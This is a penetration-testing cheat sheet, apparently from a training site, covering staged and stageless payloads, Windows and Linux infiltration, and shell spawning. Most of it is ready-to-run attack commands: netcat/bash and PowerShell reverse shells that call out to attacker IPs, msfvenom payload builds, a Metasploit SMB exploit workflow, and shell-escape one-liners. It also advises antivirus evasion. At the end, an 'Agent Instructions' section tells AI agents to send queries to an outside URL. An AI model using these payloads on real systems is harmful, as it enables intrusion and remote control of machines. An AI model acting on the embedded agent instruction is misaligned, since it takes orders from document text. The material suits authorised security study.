# Shells & Payloads: Payloads Overview

## Payloads Overview

### Types of Payloads

* **Staged Payloads**
  * Sends initial stage first, then downloads main payload
  * Better for environments with sufficient memory
  * Example naming: `windows/meterpreter/reverse_tcp`
* **Stageless Payloads**
  * Entire payload sent at once
  * Ideal for low-bandwidth environments
  * Example naming: `windows/meterpreter_reverse_tcp`

### Essential Payload Commands

#### Netcat/Bash Reverse Shell

```bash
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
```

#### PowerShell Reverse Shell

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"
```

### MSFvenom Payload Generation

* **List Available Payloads**

  ```bash
  msfvenom -l payloads
  ```
* **Linux Payload Creation**

  ```bash
  msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elf
  ```
* **Windows Payload Creation**

  ```bash
  msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe
  ```

## Windows System Infiltration

### Fingerprinting Windows Hosts

* **TTL Check via Ping**

  ```bash
  ping <target_ip>    # Look for TTL=128 or 32
  ```
* **Nmap OS Detection**

  ```bash
  sudo nmap -v -O <target_ip>
  sudo nmap -v -A <target_ip>    # Aggressive scan
  ```

### Key Windows Ports

* **139, 445**: NetBIOS/SMB
* **135**: MSRPC
* **443**: HTTPS

### Common Windows Payloads

1. **DLLs**: For privilege escalation and UAC bypass
2. **Batch Files (.bat)**: Automation scripts
3. **VBScript (.vbs)**: Client-side automation
4. **MSI Files**: Installation packages
5. **PowerShell Scripts**: System automation and exploitation

### Metasploit Attack Workflow

```bash
# Start Metasploit
sudo msfconsole

# Search for exploit
search smb

# Configure exploit
use <exploit_number>
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>

# Execute
exploit
```

## Linux System Infiltration

### Pre-Exploitation Checklist

* [ ] Identify Linux distribution
* [ ] Check available shells and programming languages
* [ ] Determine system role (web server, database, etc.)
* [ ] Look for application-specific vulnerabilities
* [ ] Search for known CVEs

### Interactive Shell Spawning Methods

* **Python TTY Shell**

  ```bash
  python -c 'import pty; pty.spawn("/bin/sh")'
  ```
* **Basic Shell Spawning**

  ```bash
  /bin/sh -i
  perl -e 'exec "/bin/sh";'
  ruby -e 'exec "/bin/sh";'
  lua -e 'os.execute("/bin/sh")'
  awk 'BEGIN {system("/bin/sh")}'
  ```
* **VIM Shell Escape**

  ```bash
  vim -c ':!/bin/sh'
  # Or in VIM:
  :set shell=/bin/sh
  :shell
  ```

### Permission Checks

```bash
# File permissions
ls -la <path/to/file>

# Sudo permissions
sudo -l
```

## Best Practices

### Pre-Exploitation

* Always perform thorough reconnaissance
* Document all findings and attempted exploits
* Verify target scope and permissions

### Post-Exploitation

* Maintain access securely
* Document all changes made to the system
* Clean up after testing is complete

### Security Considerations

* Use staged payloads for better reliability
* Consider antivirus evasion techniques
* Always use secure channels for communication


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://edu.noirchapeau.com/shells-and-payloads-shell-overview/shells-and-payloads-payloads-overview.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.